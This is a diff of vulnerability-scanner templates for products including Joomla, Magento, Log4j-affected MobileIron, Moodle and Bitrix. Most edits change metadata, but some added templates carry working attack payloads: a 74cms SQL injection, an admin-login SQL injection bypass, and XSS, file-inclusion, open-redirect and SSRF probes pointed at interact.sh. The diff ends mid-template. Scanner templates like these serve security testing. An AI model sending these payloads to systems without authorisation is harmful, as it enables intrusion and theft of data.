+++ b/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml
@@ -4,6 +4,8 @@ info:
   name: Jira Unauthenticated Resolutions
   author: TESS
   severity: info
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: atlassian,jira
 
 requests:
diff --git a/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/vulnerabilities/jira/jira-unauthenticated-screens.yaml
index 11433c0ba1..dd4a3ad28f 100644
--- a/vulnerabilities/jira/jira-unauthenticated-screens.yaml
+++ b/vulnerabilities/jira/jira-unauthenticated-screens.yaml
@@ -6,6 +6,8 @@ info:
   severity: info
   reference:
     - https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: atlassian,jira
 
 requests:
diff --git a/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml b/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
index 819ed53606..d172c6bfdb 100644
--- a/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
+++ b/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
@@ -4,6 +4,8 @@ info:
   name: Jira Unauthenticated User Picker
   author: TechbrunchFR
   severity: info
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: atlassian,jira
 
 requests:
diff --git a/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml b/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml
index ffae9984d2..faf2cbb113 100644
--- a/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml
+++ b/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml
@@ -12,7 +12,7 @@ info:
     cvss-score: 8.6
     cwe-id: CWE-22
   remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/joomla/rusty-joomla.yaml b/vulnerabilities/joomla/rusty-joomla.yaml
index 662a4d5b87..f212e8200b 100644
--- a/vulnerabilities/joomla/rusty-joomla.yaml
+++ b/vulnerabilities/joomla/rusty-joomla.yaml
@@ -1,13 +1,18 @@
 id: rusty-joomla
 
 info:
-  name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS
+  name: Joomla! CMS <=3.4.6 - Remote Code Execution
   author: leovalcante,kiks7
   severity: critical
-  description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution.
+  description: |
+    Joomla! CMS 3.0.0 through the 3.4.6 release contains an unauthenticated PHP object injection that leads to remote code execution.
   reference:
     - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/
     - https://github.com/kiks7/rusty_joomla_rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: joomla,rce,unauth,php,cms,objectinjection
 
 requests:
@@ -30,14 +35,17 @@ requests:
       - type: regex
         name: csrf
         part: body
-        internal: true
         group: 1
         regex:
           - "<input type=\"hidden\" name=\"([0-9a-z]{32})\" value=\"1\""
+        internal: true
 
     matchers:
       - type: word
+        part: body
         words:
           - "http://rusty.jooml/;pkwxhxqxmdkkmscotwvh"
           - "Failed to decode session object"
         condition: and
+
+# Enhanced by mp on 2022/05/27
diff --git a/vulnerabilities/laravel/laravel-ignition-xss.yaml b/vulnerabilities/laravel/laravel-ignition-xss.yaml
index e813a2d5cc..ba60d9239a 100644
--- a/vulnerabilities/laravel/laravel-ignition-xss.yaml
+++ b/vulnerabilities/laravel/laravel-ignition-xss.yaml
@@ -1,9 +1,13 @@
 id: laravel-ignition-xss
 
 info:
-  name: Laravel Ignition XSS
+  name: Laravel Ignition Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
+  description: |
+    Laravel's Ignition contains a cross-site scripting vulnerability when debug mode is enabled.
+  remediation: |
+    Disable Laravel's debug mode by setting APP_DEBUG to false.
   reference:
     - https://www.acunetix.com/vulnerabilities/web/laravel-ignition-reflected-cross-site-scripting/
     - https://github.com/facade/ignition/issues/273
@@ -21,11 +25,11 @@ requests:
         words:
           - "Undefined index: --><svg onload=alert(document.domain)> in file"
 
-      - type: status
-        status:
-          - 500
-
       - type: word
         part: header
         words:
           - "text/html"
+
+      - type: status
+        status:
+          - 500
diff --git a/vulnerabilities/linkerd/linkerd-ssrf.yaml b/vulnerabilities/linkerd/linkerd-ssrf.yaml
index ec72073405..23f52c1e15 100644
--- a/vulnerabilities/linkerd/linkerd-ssrf.yaml
+++ b/vulnerabilities/linkerd/linkerd-ssrf.yaml
@@ -13,7 +13,7 @@ requests:
     path:
       - "{{BaseURL}}"
     headers:
-      l5d-dtab: /svc/* => /$/inet/example.com/443
+      l5d-dtab: /svc/* => /$/inet/interact.sh/443
 
     matchers-condition: or
     matchers:
diff --git a/vulnerabilities/magento/magento-2-exposed-api.yaml b/vulnerabilities/magento/magento-2-exposed-api.yaml
index 57e53632c6..ddf8e7633a 100644
--- a/vulnerabilities/magento/magento-2-exposed-api.yaml
+++ b/vulnerabilities/magento/magento-2-exposed-api.yaml
@@ -7,6 +7,8 @@ info:
   description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed.
   reference:
     - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api
+  metadata:
+    shodan-query: http.component:"Magento"
   tags: magento
 
 requests:
diff --git a/vulnerabilities/magento/magento-cacheleak.yaml b/vulnerabilities/magento/magento-cacheleak.yaml
index f33789b6ce..6b43d14bf6 100644
--- a/vulnerabilities/magento/magento-cacheleak.yaml
+++ b/vulnerabilities/magento/magento-cacheleak.yaml
@@ -11,6 +11,9 @@ info:
     - https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak
     - https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/
     - https://royduineveld.nl/magento-cacheleak-exploit/
+  metadata:
+    verified: true
+    shodan-query: http.component:"Magento"
   tags: magento
 
 requests:
diff --git a/vulnerabilities/magento/magento-unprotected-dev-files.yaml b/vulnerabilities/magento/magento-unprotected-dev-files.yaml
index 9551d09981..d535d224b9 100644
--- a/vulnerabilities/magento/magento-unprotected-dev-files.yaml
+++ b/vulnerabilities/magento/magento-unprotected-dev-files.yaml
@@ -8,6 +8,9 @@ info:
     Magento, "these tests are not supposed to end up on production servers".
   reference:
     - https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing
+  metadata:
+    verified: true
+    shodan-query: http.component:"Magento"
   tags: magento
 
 requests:
diff --git a/vulnerabilities/metersphere/metersphere-plugin-rce.yaml b/vulnerabilities/metersphere/metersphere-plugin-rce.yaml
index 86ff474427..ea61e7f7c0 100644
--- a/vulnerabilities/metersphere/metersphere-plugin-rce.yaml
+++ b/vulnerabilities/metersphere/metersphere-plugin-rce.yaml
@@ -1,12 +1,18 @@
 id: metersphere-plugin-rce
 
 info:
-  name: MeterSphere Plugin Pre-auth RCE
+  name: MeterSphere - Remote Code Execution
   author: pdteam,y4er
   severity: critical
+  description: |
+    MeterSphere is susceptible to remote code execution.
   reference:
     - https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/
     - https://github.com/metersphere/metersphere
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: metersphere,rce,intrusive
 
 requests:
@@ -40,6 +46,7 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - '"data":'
           - '"success":true'
@@ -56,4 +63,6 @@ requests:
     extractors:
       - type: regex
         regex:
-          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
\ No newline at end of file
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+
+# Enhanced by mp on 2022/05/26
diff --git a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
index 5b1e366207..e9d17adb85 100644
--- a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
+++ b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
@@ -3,18 +3,24 @@ id: mobileiron-log4j-jndi-rce
 info:
   name: Ivanti MobileIron Log4J JNDI RCE
   author: meme-lord
-  severity: high
-  description: Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker
-    who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+  severity: critical
+  description: Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
   reference:
     - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
     - https://www.lunasec.io/docs/blog/log4j-zero-day/
     - https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
-  classification:
-    cve-id: CVE-2021-44228
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
   remediation: Upgrade to version 2.14.2 or higher of MobileIron. If this is not possible, several Log4j exploit workarounds are available.
-  tags: jndi,log4j,rce,cve,cve2021
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2021-44228
+    cwe-id: CWE-917
+  metadata:
+    shodan-query: http.html:"MobileIron"
+    verified: "true"
+  tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
 
 requests:
   - raw:
diff --git a/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml b/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
index 26c79550c9..97d602bd2f 100644
--- a/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
+++ b/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
@@ -1,11 +1,17 @@
 id: moodle-filter-jmol-lfi
 
 info:
-  name: Moodle filter_jmol - LFI
+  name: Moodle Jmol Filter 6.1 - Local File Inclusion
   author: madrobot
   severity: high
-  description: Local file inclusion on Moodle.
-  tags: moodle,lfi
+  description: Moodle is vulnerable to local file inclusion.
+  reference:
+    - https://www.exploit-db.com/exploits/46881
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: moodle,lfi,edb
 
 requests:
   - method: GET
@@ -20,3 +26,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml
index 290e17322f..3a642b46b5 100644
--- a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml
+++ b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml
@@ -7,15 +7,15 @@ info:
   description: Netsweeper version 4.0.9 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability.
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
-  tags: netsweeper,redirect
+  tags: netsweeper,redirect,packetstorm
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/"
+      - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
diff --git a/vulnerabilities/netsweeper/netsweeper-rxss.yaml b/vulnerabilities/netsweeper/netsweeper-rxss.yaml
index 18892a3101..8b85901e9f 100644
--- a/vulnerabilities/netsweeper/netsweeper-rxss.yaml
+++ b/vulnerabilities/netsweeper/netsweeper-rxss.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
-  tags: netsweeper,xss
+  tags: xss,packetstorm,netsweeper
 
 requests:
   - method: GET
diff --git a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
index 42aa25e801..4d06200f40 100644
--- a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
+++ b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
@@ -1,12 +1,13 @@
 id: oracle-ebs-bispgrapgh-file-read
 
 info:
-  name: Oracle EBS Bispgraph File Access
+  name: Oracle eBusiness Suite - Improper File Access
   author: emenalf,tirtha_mandal,thomas_from_offensity
   severity: critical
+  description: |
+    Oracle eBusiness Suite is susceptible to improper file access vulnerabilities via bispgrapgh. Be aware this product is no longer supported with patches or security fixes.
   reference:
     - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
-    - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
     - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
   tags: oracle,lfi
 
@@ -18,6 +19,8 @@ requests:
 
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
+
+# Enhanced by mp on 2022/05/26
diff --git a/vulnerabilities/oracle/oracle-siebel-xss.yaml b/vulnerabilities/oracle/oracle-siebel-xss.yaml
index 161b89486b..223a835592 100644
--- a/vulnerabilities/oracle/oracle-siebel-xss.yaml
+++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 7.2
     cwe-id: CWE-79
   remediation: Upgrade to Siebel Loyalty version 8.2 or later.
-  tags: xss,oracle,siebel
+  tags: xss,oracle,siebel,packetstorm,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml
index 8e7f717257..4875f89f35 100644
--- a/vulnerabilities/oscommerce/oscommerce-rce.yaml
+++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml
@@ -8,7 +8,7 @@ info:
     command's executed output
   reference:
     - https://www.exploit-db.com/exploits/50128
-  tags: rce,oscommerce
+  tags: rce,oscommerce,edb
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/3cx-management-console.yaml b/vulnerabilities/other/3cx-management-console.yaml
index 389cf88761..dc248947bd 100644
--- a/vulnerabilities/other/3cx-management-console.yaml
+++ b/vulnerabilities/other/3cx-management-console.yaml
@@ -1,12 +1,16 @@
 id: 3cx-management-console
 
 info:
-  name: 3CX Management Console - Directory Traversal
+  name: 3CX Management Console - Local File Inclusion
   author: random-robbie
   severity: high
-  description: Directory traversal vulnerability on 3CX Management Console.
+  description: 3CX Management Console is vulnerable to local file inclusion.
   reference:
     - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   metadata:
     shoda-query: http.title:"3CX Phone System Management Console"
   tags: 3cx,lfi,voip
@@ -33,3 +37,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/74cms-sqli.yaml b/vulnerabilities/other/74cms-sqli.yaml
new file mode 100644
index 0000000000..e11f83d391
--- /dev/null
+++ b/vulnerabilities/other/74cms-sqli.yaml
@@ -0,0 +1,30 @@
+id: 74cms-sqli
+
+info:
+  name: 74cms Sql Injection
+  author: princechaddha
+  severity: critical
+  description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.
+  reference:
+    - https://github.com/possib1e/vuln/issues/3
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-89
+  tags: 74cms,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5({{num}}))) -- a'
+
+    matchers:
+      - type: word
+        words:
+          - '{{md5({{num}})}}'
+        part: body
+
+# Enhanced by ritikchaddha on 2022/05/05
diff --git a/vulnerabilities/other/WSO2-2019-0598.yaml b/vulnerabilities/other/WSO2-2019-0598.yaml
index 04fdb7b6f0..5b26787cd0 100644
--- a/vulnerabilities/other/WSO2-2019-0598.yaml
+++ b/vulnerabilities/other/WSO2-2019-0598.yaml
@@ -1,15 +1,19 @@
 id: WSO2-2019-0598
 
 info:
-  name: WSO2 < 5.8.0 - Server Side Request Forgery
+  name: WSO2 <5.8.0 - Server Side Request Forgery
   author: Amnotacat
-  severity: critical
+  severity: medium
   description: |
-    This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL.
+    WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL.
   reference:
     - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598
   remediation: |
-    Upgrade the product version to 5.8.0 or higher which are not affected by this SSRF vulnerability.
+    Upgrade the product version to 5.8.0 or higher.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 6.8
+    cwe-id: CWE-918
   tags: ssrf,wso2,shindig
 
 requests:
@@ -25,4 +29,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/26
diff --git a/vulnerabilities/other/acme-xss.yaml b/vulnerabilities/other/acme-xss.yaml
index 3b4de118e0..8c6428f53a 100644
--- a/vulnerabilities/other/acme-xss.yaml
+++ b/vulnerabilities/other/acme-xss.yaml
@@ -1,7 +1,7 @@
 id: acme-xss
 
 info:
-  name: ACME / Let's Encrypt Reflected XSS
+  name: ACME / Let's Encrypt Cross-Site Scripting
   author: pdteam
   severity: medium
   tags: xss,acme
diff --git a/vulnerabilities/other/alumni-management-sqli.yaml b/vulnerabilities/other/alumni-management-sqli.yaml
new file mode 100644
index 0000000000..2e2bd0ec71
--- /dev/null
+++ b/vulnerabilities/other/alumni-management-sqli.yaml
@@ -0,0 +1,44 @@
+id: alumni-management-sqli
+
+info:
+  name: Alumni Management System 1.0 - SQLi Authentication Bypass
+  author: arafatansari
+  severity: high
+  description: |
+    Alumni Management System Admin Login page can be bypassed with a simple SQLi to the username parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/48883
+  tags: sqli,auth-bypass,cms,edb,alumni
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin'+or+'1'%3D'1'%23&password=nuclei
+
+      - |
+        GET /admin/index.php?page=home HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Welcome back Admin!'
+          - 'Alumni List'
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - '#login-form'
+        negative: true
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/asanhamayesh-lfi.yaml b/vulnerabilities/other/asanhamayesh-lfi.yaml
index 462ea627f3..8498ce7225 100644
--- a/vulnerabilities/other/asanhamayesh-lfi.yaml
+++ b/vulnerabilities/other/asanhamayesh-lfi.yaml
@@ -1,12 +1,17 @@
 id: asanhamayesh-lfi
 
 info:
-  name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability
+  name: Asanhamayesh CMS 3.4.6 - Local File Inclusion
   author: 0x_Akoko
   severity: high
+  description: Asanhamayesh CMS 3.4.6 is vulnerable to local file inclusion.
   reference:
     - https://cxsecurity.com/issue/WLB-2018030006
     - https://asanhamayesh.com
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: asanhamayesh,lfi,traversal
 
 requests:
@@ -23,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml
index e6ce2c4e2f..1dcc28d81d 100644
--- a/vulnerabilities/other/aspnuke-openredirect.yaml
+++ b/vulnerabilities/other/aspnuke-openredirect.yaml
@@ -9,10 +9,10 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
+      - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'
\ No newline at end of file
+          - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$'
\ No newline at end of file
diff --git a/vulnerabilities/other/avada-xss.yaml b/vulnerabilities/other/avada-xss.yaml
index 6c0001f1f3..ccfb12bf6f 100644
--- a/vulnerabilities/other/avada-xss.yaml
+++ b/vulnerabilities/other/avada-xss.yaml
@@ -1,14 +1,14 @@
 id: avada-xss
 
 info:
-  name: Avada < 7.4.2 - Reflected Cross-Site Scripting
+  name: Avada < 7.4.2 - Cross-Site Scripting
   author: Akincibor
   severity: medium
   description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue.
   reference:
     - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
     - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/
-  tags: xss,wp,wordpress,wp-theme,avada
+  tags: xss,wp,wordpress,wp-theme,avada,wpscan
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/bems-api-lfi.yaml b/vulnerabilities/other/bems-api-lfi.yaml
index fa2efedbb9..f451d4fc6b 100644
--- a/vulnerabilities/other/bems-api-lfi.yaml
+++ b/vulnerabilities/other/bems-api-lfi.yaml
@@ -1,13 +1,18 @@
 id: bems-api-lfi
 
 info:
-  name: Longjing Technology BEMS API 1.21 - Arbitrary File Retrieval
+  name: Longjing Technology BEMS API 1.21 - Local File Inclusion
   author: gy741
   severity: high
-  description: The application suffers from an unauthenticated arbitrary file retrieval vulnerability. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
+  description: Longjing Technology BEMS API 1.21 is vulnerable to local file inclusion. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
   reference:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
-  tags: lfi
+    - https://packetstormsecurity.com/files/163702/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,packetstorm
 
 requests:
   - method: GET
@@ -23,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/other/beward-ipcamera-disclosure.yaml b/vulnerabilities/other/beward-ipcamera-disclosure.yaml
index 7914b6da9f..1f6c764641 100644
--- a/vulnerabilities/other/beward-ipcamera-disclosure.yaml
+++ b/vulnerabilities/other/beward-ipcamera-disclosure.yaml
@@ -12,7 +12,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
     cwe-id: CWE-22
-  tags: iot,camera,disclosure
+  tags: iot,camera,disclosure,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml
index 676932a520..d717cc9e11 100644
--- a/vulnerabilities/other/bitrix-open-redirect.yaml
+++ b/vulnerabilities/other/bitrix-open-redirect.yaml
@@ -7,30 +7,30 @@ info:
   description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.
   reference:
     - https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
-  tags: redirect,bitrix
+  tags: redirect,bitrix,packetstorm
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
+      - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
